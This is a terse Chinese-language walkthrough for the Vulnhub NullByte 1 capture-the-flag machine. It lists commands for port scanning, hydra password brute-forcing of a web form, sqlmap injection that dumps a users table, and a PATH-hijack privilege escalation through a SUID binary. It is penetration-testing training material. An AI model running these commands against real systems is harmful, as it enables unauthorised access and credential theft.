Walkthroughs Archive Categories Tags RSS Feed 镜像下载
- 目录 -
Vulnhub 126 NULLBYTE 1 简

靶机链接:https://www.vulnhub.com/entry/nullbyte-1,126/

环境配置

名称IP
Kali Linux192.168.88.153
NULLBYTE: 1192.168.88.152

初步打点

端口扫描

1
2

$ export rip=192.168.88.152
$ sudo nmap -v -A -p- $rip


1

$ exiftool main.gif 


1

$ hydra -l "" -P /usr/share/dirb/wordlists/big.txt 192.168.88.152 http-post-form 


1
2
3
4

$ sqlmap -u "http://192.168.88.152/kzMb5nVYJw/420search.php?usrtosearch=test"
$ sqlmap -u "http://192.168.88.152/kzMb5nVYJw/420search.php?usrtosearch=test" --dbs
$ sqlmap -u "http://192.168.88.152/kzMb5nVYJw/420search.php?usrtosearch=test" --tables -D seth
$ sqlmap -u "http://192.168.88.152/kzMb5nVYJw/420search.php?usrtosearch=test" --dump -T users  -D seth


1
2
3
4

$ cp /bin/sh /tmp/ps
$ echo $PATH
$ export PATH=/tmp/:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
$ ./procwatch

最后修改于 2015-08-01

Vulnhub靶机教程
Vulnhub中文网站
Walkthroughs Archive Categories Tags RSS Feed 镜像下载
Hugo Theme Diary by Rise
移植自 Makito's Journal.

© This is a customized copyright.
- 目录 -